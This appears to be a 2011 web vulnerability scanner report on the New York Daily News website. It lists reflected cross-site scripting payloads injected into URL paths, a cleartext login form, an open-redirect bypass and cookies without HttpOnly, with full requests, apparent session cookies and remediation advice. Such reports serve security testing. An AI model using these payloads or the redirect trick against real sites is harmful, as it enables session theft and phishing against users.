GET /nydne272c'%3balert(1)//496b14c059d/dwr/interface/mostPopularStories.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:31:05 GMT
Server: Apache
Keep-Alive: timeout=3, max=973
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70231
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 601fb<script>alert(1)</script>a6fb0fe92da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nydn/dwr/interface/mostPopularStories.js601fb<script>alert(1)</script>a6fb0fe92da HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46158'%3balert(1)//563fa04117e was submitted in the REST URL parameter 1. This input was echoed as 46158';alert(1)//563fa04117e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydn46158'%3balert(1)//563fa04117e/dwr/util.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:32:30 GMT
Server: Apache
Keep-Alive: timeout=3, max=991
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70207
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc0e7'%3balert(1)//05d3c538398 was submitted in the REST URL parameter 1. This input was echoed as dc0e7';alert(1)//05d3c538398 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydndc0e7'%3balert(1)//05d3c538398/emailArticle.do HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:24:49 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70086
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24725'%3balert(1)//ff55bae047e was submitted in the REST URL parameter 1. This input was echoed as 24725';alert(1)//ff55bae047e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d358a'%3balert(1)//dc530969488 was submitted in the REST URL parameter 1. This input was echoed as d358a';alert(1)//dc530969488 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /real_estated358a'%3balert(1)//dc530969488/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:35:29 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70084
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d645'%3balert(1)//e32d4ea5441 was submitted in the REST URL parameter 2. This input was echoed as 3d645';alert(1)//e32d4ea5441 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /real_estate/index.html3d645'%3balert(1)//e32d4ea5441 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:35:43 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70084
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86331'%3balert(1)//aec1888faef was submitted in the REST URL parameter 1. This input was echoed as 86331';alert(1)//aec1888faef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services86331'%3balert(1)//aec1888faef/apps/ipad/redir.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:02 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70095
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23e21'%3balert(1)//5b3720694d4 was submitted in the REST URL parameter 2. This input was echoed as 23e21';alert(1)//5b3720694d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/apps23e21'%3balert(1)//5b3720694d4/ipad/redir.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:18 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70095
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d800'%3balert(1)//c1735182a1c was submitted in the REST URL parameter 3. This input was echoed as 7d800';alert(1)//c1735182a1c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/apps/ipad7d800'%3balert(1)//c1735182a1c/redir.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:33 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70093
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16cdc'%3balert(1)//12dd587eaf8 was submitted in the REST URL parameter 4. This input was echoed as 16cdc';alert(1)//12dd587eaf8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/apps/ipad/redir.html16cdc'%3balert(1)//12dd587eaf8 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:48 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70093
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bac72'%3balert(1)//2c3425a1503 was submitted in the REST URL parameter 1. This input was echoed as bac72';alert(1)//2c3425a1503 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /homedeliverybac72'%3balert(1)//2c3425a1503/index.php HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:29 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 69852
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.nydailynews.com/nydn/login.do
The form contains the following password field:
password
Issue background
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
Request
GET /nydn/content/protected/userAccount.jsp HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Set-Cookie: JSESSIONID=xAPb30RhH50nMVMVvntz4Q**; Path=/nydn Content-Type: text/html;charset=ISO-8859-1 Date: Tue, 08 Feb 2011 18:28:38 GMT Connection: close Content-Length: 40694
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .ad22d5cbb6a586667/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Remediation detail
When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.
Issue background
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Remediation background
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
Request
GET /real_estate/index.html?.ad22d5cbb6a586667/=1 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://bestplaces.nydai ...[SNIP]...
4. Cookie without HttpOnly flag set
There are 17 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
